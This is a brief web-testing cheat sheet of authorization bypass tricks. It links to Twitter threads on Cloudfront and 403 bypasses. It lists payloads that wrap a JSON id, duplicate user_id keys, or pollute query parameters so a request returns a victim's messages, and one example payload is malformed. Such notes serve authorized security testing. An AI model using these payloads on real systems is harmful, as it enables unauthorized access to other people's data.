Bypasses

Cloudfront Bypass -

403 Bypass:

https://twitter.com/RathiArpeet/status/1315593774773334016
https://twitter.com/hackerscrolls/status/1254701239360720900

Tool -

https://twitter.com/SalahHasoneh1/status/1284869760921014274?s=20

{“id”:111} --> 401 Unauthriozied {“id”:{“id”:111}} --> 200 OK

POST /api/get_profile Content-Type: application/json {“user_id”:,”user_id”:}

GET /api_v1/messages?user_id=VICTIM_ID --> 401

GET /api_v1/messages?user_id=attack&user_id=VICTIM --> 200 OK

https://twitter.com/iam_j0ker/status/1303658167205728256?s=20